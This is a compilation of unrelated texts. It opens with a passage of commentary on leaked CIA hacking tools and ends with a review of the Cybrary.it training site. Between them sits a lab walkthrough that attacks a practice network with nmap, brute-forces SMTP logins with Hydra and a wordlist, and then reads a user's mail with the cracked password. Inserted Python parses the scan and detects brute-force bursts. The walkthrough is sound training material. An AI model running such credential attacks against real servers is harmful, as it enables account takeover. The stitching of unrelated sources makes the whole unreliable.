As an example, specific CIA malware revealed in “Year Zero” is able to penetrate, infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts. The CIA attacks this software by using undisclosed security vulnerabilities (“zero days”) possessed by the CIA but if the CIA can hack these phones then so can everyone else who has obtained or discovered the vulnerability. As long as the CIA keeps these vulnerabilities concealed from Apple and Google (who make the phones) they will not be fixed, and the phones will remain hackable.
The same vulnerabilities exist for the population at large, including the U.S. Cabinet, Congress, top CEOs, system administrators, security officers and engineers. By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone, at the expense of leaving everyone hackable.
‘Cyberwar’ programs are a serious proliferation risk
Cyber ‘weapons’ are not possible to keep under effective control.
While nuclear proliferation has been restrained by the enormous costs and visible infrastructure involved in assembling enough fissile material to produce a critical nuclear mass, cyber ‘weapons’, once developed, are very hard to retain.
Cyber ‘weapons’ are in fact just computer programs which can be pirated like any other. Since they are entirely comprised of information they can be copied quickly with no marginal cost.
Securing such ‘weapons’ is particularly difficult since the same people who develop and use them have the skills to exfiltrate copies without leaving traces — sometimes by using the very same ‘weapons’ against the organizations that contain them. There are substantial price incentives for government hackers and consultants to obtain copies since there is a global “vulnerability market” that will pay hundreds of thousands to millions of dollars for copies of such ‘weapons’. Similarly, contractors and companies who obtain such ‘weapons’ sometimes use them for their own purposes, obtaining advantage over their competitors in selling ‘hacking’ services.
Over the last three years the United States intelligence sector, which consists of government agencies such as the CIA and NSA and their contractors, such as Booz Allen Hamilton, has been subject to an unprecedented series of data exfiltrations by its own workers.
A number of intelligence community members not yet publicly named have been arrested or subject to federal criminal investigations in separate incidents.
Most visibly, on February 8, 2017 a U.S. federal grand jury indicted Harold T. Martin III with 20 counts of mishandling classified information. The Department of Justice alleged that it seized some 50,000 gigabytes of information from Harold T. Martin III that he had obtained from classified programs at NSA and CIA, including the source code for numerous hacking tools.
Once a single cyber ‘weapon’ is ‘loose’ it can spread around the world in seconds, to be used by peer states, cyber mafia and teenage hackers alike.
U.S. Consulate in Frankfurt is a covert CIA hacker base
In addition to its operations in Langley, Virginia the CIA also uses the U.S. consulate in Frankfurt as a covert base for its hackers covering Europe, the Middle East and Africa.
CIA hackers operating out of the Frankfurt consulate ( “Center for Cyber Intelligence Europe” or CCIE) are given diplomatic (“black”) passports and State Department cover. The instructions for incoming CIA hackers make Germany’s counter-intelligence efforts appear inconsequential: “Breeze through German Customs because you have your cover-for-action story down pat, and all they did was stamp your passport”
Your Cover Story (for this trip) Q: Why are you here? A: Supporting technical consultations at the Consulate.
Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Schengen open border area — including France, Italy and Switzerland.
A number of the CIA’s electronic attack methods are designed for physical proximity. These attack methods are able to penetrate high security networks that are disconnected from the internet, such as a police records database. In these cases, a CIA officer, agent or allied intelligence officer acting under instructions, physically infiltrates the targeted workplace. The attacker is provided with a USB containing malware developed for the CIA for this purpose, which is inserted into the targeted computer. The attacker then infects and exfiltrates data to removable media. For example, the CIA attack system Fine Dining provides 24 decoy applications for CIA spies to use. To witnesses, the spy appears to be running a program showing videos (e.g. VLC), presenting slides (Prezi), playing a computer game (Breakout2, 2048) or even running a fake virus scanner (Kaspersky, McAfee, Sophos). But while the decoy application is on the screen, the underlying system is automatically infected and ransacked.
How the CIA dramatically increased proliferation risks
In what is surely one of the most astounding intelligence own goals in living memory, the CIA structured its classification regime such that for the most market-valuable part of “Vault 7” — the CIA’s weaponized malware (implants + zero days), Listening Posts (LP), and Command and Control (C2) systems — the agency has little legal recourse.
The CIA made these systems unclassified.
Why the CIA chose to make its cyberarsenal unclassified reveals how concepts developed for military use do not easily cross over to the ‘battlefield’ of cyber ‘war’.
To attack its targets, the CIA usually requires that its implants communicate with their control programs over the internet. If CIA implants, Command & Control and Listening Post software were classified, then CIA officers could be prosecuted or dismissed for violating rules that prohibit placing classified information onto the Internet. Consequently, the CIA has secretly made most of its cyber spying/war code unclassified. The U.S. government is not able to assert copyright either, due to restrictions in the U.S. Constitution. This means that cyber ‘arms’ manufacturers and computer hackers can freely “pirate” these ‘weapons’ if they are obtained. The CIA has primarily had to rely on obfuscation to protect its malware secrets.
Conventional weapons such as missiles may be fired at the enemy (i.e into an unsecured area). Proximity to or impact with the target detonates the ordnance including its classified parts. Hence military personnel do not violate classification rules by firing ordnance with classified parts. Ordnance will likely explode. If it does not, that is not the operator’s intent.
Over the last decade U.S. hacking operations have been increasingly dressed up in military jargon to tap into Department of Defense funding streams. For instance, attempted “malware injections” (commercial jargon) or “implant drops” (NSA jargon) are being called “fires” as if a weapon was being fired. However the analogy is questionable.
Unlike bullets, bombs or missiles, most CIA malware is designed to live for days or even years after it has reached its ‘target’. CIA malware does not “explode on impact” but rather permanently infests its target. In order to infect a target’s device, copies of the malware must be placed on the target’s devices, giving physical possession of the malware to the target. To exfiltrate data back to the CIA or to await further instructions the malware must communicate with CIA Command & Control (C2) systems placed on internet connected servers. But such servers are typically not approved to hold classified information, so CIA command and control systems are also made unclassified.
A successful ‘attack’ on a target’s computer system is more like a series of complex stock maneuvers in a hostile take-over bid or the careful planting of rumors in order to gain control over an organization’s leadership rather than the firing of a weapons system. If there is a military analogy to be made, the infestation of a target is perhaps akin to the execution of a whole series of military maneuvers against the target’s territory including observation, infiltration, occupation and exploitation.
Evading forensics and anti-virus
A series of standards lays out CIA malware infestation patterns, which are likely to assist forensic crime scene investigators as well as Apple, Microsoft, Google, Samsung, Nokia, Blackberry, Siemens and anti-virus companies in attributing and defending against attacks.
In my previous post “Pentestit Lab v10 – Introduction & Layout”, I covered the Network layout and VPN Connection. Today I will be covering the first steps taken to attack the lab – which will include the following:
Fingerprinting the GW machine
Carrying out Intelligence Gathering
Brute Forcing SMTP
Finding the Mail Token
There are 13 Tokens in total scattered throughout the lab (Network). The posts are in the order of compromise that provided the best results and was the most logical. I closely followed The Penetration Testing Execution Standard (PTES), which aided me in compromising the next system or device using previously gained information.
What does this mean? It means that I started by enumerating users and gathering emails, passwords, and any other network information that seemed useful. With this information I was able to log into other devices and leverage exploits or logins further in the process; this also allowed me to pivot easily from machine to machine and gain deeper access to the network, until I was finally able to take control of the Domain Controller.
If you are completely unfamiliar with how a “Grey Box” Penetration Test is carried out on a Network – along with the exploitation of Web Applications, daemons and services – then I highly suggest you get ahold of and read the following resources – as well as read the PTES Standards that I linked above.
As with anything, if you have any comments, questions, or general concerns/issues/suggestions about my techniques – please leave a comment below!
Fingerprinting the GW Machine:
Consult the Network Map if you forgot what or where the GW Machine is. Since it’s the only Server sitting between us (possibly in the DMZ) and the internal network, we have to compromise it first to gain access to the internal network.
Since we already have VPN access to the lab – we can start by fingerprinting the gw machine (also called Active Footprinting in the PTES).
We can do so by running Nmap as a SYN Stealth Scan with the -sS option, as well as running the -A option for OS detection, version detection, script scanning, and traceroute. I also used the -n option to disable DNS Resolution.
If you are unfamiliar with the Nmap scan options, or need a quick refresher – then I suggest you read the Nmap Options Summary.
eb7u6 (protocol 2.0)
| 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
| 2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
|_ 256 2c:58:fd:06:ea:46:8e:f7:b5:28:58:58:06:fa:dc:38 (ECDSA)
25/tcp open smtp CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
80/tcp open http nginx 1.10.1
|_http-title: 403 Forbidden
443/tcp open http nginx 1.2.1
|_http-title: Security Blog by GlobalDataSecurity
8100/tcp open http CommuniGate Pro httpd 6.0.9
|_ Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
|_http-title: CommuniGate Pro gds.lab Entrance
| Public Options: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
| Allowed Methods: OPTIONS, GET, HEAD, POST, PUT, DELETE, LOCK, UNLOCK, MKCOL, PROPFIND, PROPPATCH, MOVE, COPY, REPORT, SEARCH, ACL, MKCALENDAR
| Server Type: CommuniGatePro/6.0.9
| Server Date: Tue, 24 Jan 2017 23:31:59 GMT
| WebDAV type: Unkown
| Directory Listing:
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall|broadband router|media device
Running (JUST GUESSING): Linux 3.X|2.6.X (91%), WatchGuard Fireware 11.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3.x
Aggressive OS guesses: Linux 3.2 - 3.8 (91%), Linux 3.8 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Linux 3.2.0 (90%), Linux 3.0 - 3.2 (88%), Linux 3.5 (88%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%), Linux 2.6.39 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: gds.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 117.65 ms 10.10.0.1
2 117.82 ms 184.108.40.206
3 118.93 ms 192.168.101.9
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.62 seconds
Our initial review of the Nmap scans reveals that the following ports are open:
TCP/22 – SSH
TCP/25 – SMTP (CommuniGate Pro)
TCP/80 – nginx (HTTP)
TCP/443 – nginx (HTTPS)
TCP/8100 – CommuniGate Pro (HTTPD) – Email Server
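Reading the scan by hand is fine for one host, but the same summary can be produced from Nmap's normal output programmatically. The following is an added example (not part of the original walkthrough) that parses the port lines above into records and also pulls out the WebDAV methods flagged on TCP/8100, which on a mail server's web interface are worth confirming as authenticated or disabled; the excerpt it parses is constructed from the output shown above, minus the truncated SSH line.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt modelled on the port lines of the nmap -sS -A -n scan
# above (the truncated SSH line is left out); not the scan's raw output file.
SCAN_OUTPUT = """\
25/tcp   open  smtp  CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
80/tcp   open  http  nginx 1.10.1
|_http-title: 403 Forbidden
443/tcp  open  http  nginx 1.2.1
|_http-title: Security Blog by GlobalDataSecurity
8100/tcp open  http  CommuniGate Pro httpd 6.0.9
|_ Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_http-title: CommuniGate Pro gds.lab Entrance
"""
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
RISKY_RE = re.compile(r"Potentially risky methods:\s*(.*)$")

@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    risky_methods: list = field(default_factory=list)

def parse_nmap_ports(text):
    """Parse nmap normal output into Port records. Script-output lines
    (starting with '|') belong to the port line that precedes them, which
    is how the risky-methods list ends up attached to TCP/8100."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), m.group(5).strip()))
            continue
        r = RISKY_RE.search(line)
        if r and ports:
            ports[-1].risky_methods = r.group(1).split()
    return ports

def summarise(ports):
    """The one-line-per-port summary the walkthrough writes out by hand."""
    return [f"{p.proto.upper()}/{p.number} - {p.service} ({p.version})"
            for p in ports if p.state == "open"]

def write_capable_webdav(ports):
    """Ports advertising methods that modify server content; on a mail
    server's web interface these should be authenticated or disabled."""
    write = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}
    return [p.number for p in ports if write & set(p.risky_methods)]
```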
Logically, we can’t attack SSH since we don’t have any credentials. SMTP can be used to enumerate users… but that could be tedious if we don’t know how login names are structured. I could try accessing CommuniGate Pro with an exploit… but version 6.0.9 had no known exploit at the time of writing.
The best bet – and most logical step – would be to explore TCP/80 and TCP/443 and see what the website holds for us. Maybe there are vulnerabilities, comments in the source code, account details, etc.
Before I continue to the website, a quick tip: add the following to your /etc/hosts file so you don’t encounter any issues when accessing the website.
root@kali:~# nano /etc/hosts
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
Once you have added store.gds.lab to the hosts file, navigate to the IP 192.168.101.9 and check out the website.
It seems that the website is that of a Global Data Security company selling Security Software… uhmmmm this is going to be fun!
Quickly digging through the website and its associated links really didn’t provide me with anything valuable. So I decided to move on and try TCP/443.
This is rather interesting! By the looks of it, I think I stumbled on the Blog of Global Data Security. Maybe we can find some account details such as usernames perhaps?
A quick look at the source code for the main page revealed the following:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>Security Blog by GlobalDataSecurity</title>
<!-- Bootstrap Core CSS -->
<link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<!-- Theme CSS -->
<!-- Alfred Modlin said use this template -->
<link href="css/clean-blog.min.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href='https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
Notice the comment? <!-- Alfred Modlin said use this template --> It seems like we got a possible username. Let’s save this for later in case we need it.
I notice that there is a “Contact Us” section on the blog as well, let’s go dig around there!
Well, well, what do we have here? Emails! This is great! We now know how the usernames are structured for Global Data Security. So Alfred Modlin should be
Let’s add those usernames to a list for safe keeping.
root@kali:~# hydra -L names -P /usr/share/wordlists/rockyou.txt 192.168.101.9 smtp
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-17 17:47:43
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 64 tasks, 43033197 login tries (l:3/p:14344399), ~42024 tries per task
[DATA] attacking service smtp on port 25
[STATUS] 221.00 tries/min, 221 tries in 00:01h, 43032976 to do in 3245:20h, 16 active
[STATUS] 215.67 tries/min, 647 tries in 00:03h, 43032550 to do in 3325:33h, 16 active
[STATUS] 215.57 tries/min, 1509 tries in 00:07h, 43031688 to do in 3326:57h, 16 active
[STATUS] 191.07 tries/min, 2866 tries in 00:15h, 43030460 to do in 3753:32h, 16 active
[smtp] host: 192.168.101.9 login: email@example.com password: justdoit
Nice! We got a password for a.modlin! And since we got that… let’s snoop around his emails, shall we?
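On the defending side, a run like this is loud: one source, sixteen parallel connections, roughly 200 failed AUTHs a minute spread over a handful of usernames, and then a success. The following is an added example (not from the original post) of detection logic run over constructed SMTP authentication log lines; the log format and the two extra usernames are assumptions, not CommuniGate Pro's real syntax or the lab's real accounts.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed log format (not CommuniGate Pro's real log syntax): one line
# per SMTP AUTH attempt with timestamp, result, username and client address.
LOG_RE = re.compile(r"^(?P<ts>\S+) smtp auth (?P<result>ok|failed) "
                    r"user=(?P<user>\S+) ip=(?P<ip>\S+)$")

def build_sample_log():
    """Constructed sample: one client cycling three usernames at about
    200 tries/min (the rate Hydra reports above) until one password hits,
    plus a legitimate user who mistypes once and then logs in."""
    t0 = datetime(2017, 3, 17, 17, 47, 43)
    users = ["a.modlin", "b.example", "c.example"]  # last two are made up
    lines = []
    for i in range(200):
        ts = t0 + timedelta(milliseconds=300 * i)
        lines.append(f"{ts.isoformat()} smtp auth failed user={users[i % 3]} ip=10.10.0.50")
    lines.append(f"{(t0 + timedelta(seconds=61)).isoformat()} smtp auth ok user=a.modlin ip=10.10.0.50")
    lines.append(f"{(t0 + timedelta(seconds=5)).isoformat()} smtp auth failed user=a.modlin ip=172.16.0.20")
    lines.append(f"{(t0 + timedelta(seconds=20)).isoformat()} smtp auth ok user=a.modlin ip=172.16.0.20")
    return lines

def detect_smtp_bruteforce(lines, window=timedelta(seconds=60), threshold=30):
    """Return alerts. A 'burst' fires the first time a source IP has at least
    `threshold` failed AUTHs inside `window`; any later successful login from
    that IP is reported as 'success-after-burst' (a probably guessed password).
    A single mistype from a normal client never reaches the threshold."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["result"],
                           m["user"], m["ip"]))
    events.sort()                    # logs may arrive out of order
    recent = defaultdict(deque)      # ip -> timestamps of failures in window
    tried = defaultdict(set)         # ip -> distinct usernames attempted
    flagged = {}                     # ip -> time the burst was first seen
    alerts = []
    for ts, result, user, ip in events:
        if result == "failed":
            q = recent[ip]
            q.append(ts)
            tried[ip].add(user)
            while ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = ts
                alerts.append(("burst", ip, len(q), len(tried[ip])))
        elif ip in flagged:
            alerts.append(("success-after-burst", ip, user, ts))
    return alerts
```

The threshold and window are starting points; tune them against a baseline of real failed-login rates so that a user retyping a password does not trip the rule.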
Finding the Mail Token:
We can access the CommuniGate Pro Email service on TCP/8100.
Once there, let’s log in with a.modlin:justdoit and see if we have access.
Bingo! We see that Alfred has two emails, one with the Token, and another one with some kind of App.
Let’s take a look and see what the app is; it might be useful.
From the email we also get some extra information about the network. We now know that there is only one SSH Port at 172.16.0.1 and that the app will allow us to see if (The .apk is attached).
I believe we will need it for later exploitation purposes, so let’s save that!
We found the token! Go ahead and submit it on the main page to gain points for it!
I didn’t post the actual token. Because, what would be the fun in that if I did? Go through and actually try to compromise the SMTP Service to get the token!
You learn by practical work, so go through this walkthrough, and the lab – and learn something new!
That’s all for now, stay tuned for the next post to compromise the next Token (2/13) – The Site Token!
In the IT world, there seems to be always a need for certified and/or experienced IT professionals. Cybrary.it is an online resource dedicated to helping people who are interested in this field get the training they need to start or grow their expertise in the IT industry.
All training courses are completely FREE. The site runs off of donations (both financially and through materials) from users and partners/sponsors.
I have personally used cybrary.it and intend to continue. I wouldn’t say it is the one-stop learning location for all IT certifications but it gets very close. The courses offered, from basic CompTIA A+ to CISSP and advanced hacking, are all well in depth and follow the structure of exam criteria.
I also have completed the PCI/DSS, A+, ITIL Foundation courses and parts of other courses. In my opinion the PCI/DSS course was probably the least extensive one that I have come across during my use (and I’ve been involved with cybrary.it for over a year at this point). Even so, I’d call it a good primer as it exposes the watcher to the basics of the PCI fundamentals, gives a crash course in many of the most used policies, and speaks on using risk management and information security. …and all of this is for FREE. In addition, members of Cybrary have been writing articles that go into additional topics that are accessible to any registered cybrary.it user.
Registration is free just like the course material and the setup includes creating your own profile. Cybrary.it isn’t just a learning source, but it’s a community, and I’ve seen it grow from just courses and a forum to include hours of reading content submitted by users and companies, a job board, current IT developments, micro certifications and more.
There is much more I could comment on but I don’t want to make this review too lengthy. Perhaps I’ll do another later on a specific element of the site. Regardless of what I choose to do, I know I’ll continue to use cybrary.it extensively for my training needs. I am currently eyeing out Security+ and CCNA.
I challenge you to take a look. There is much more material and training for the IT industry needs there than I could list here in a compact form. So take a look! I’m sure you’ll find something useful.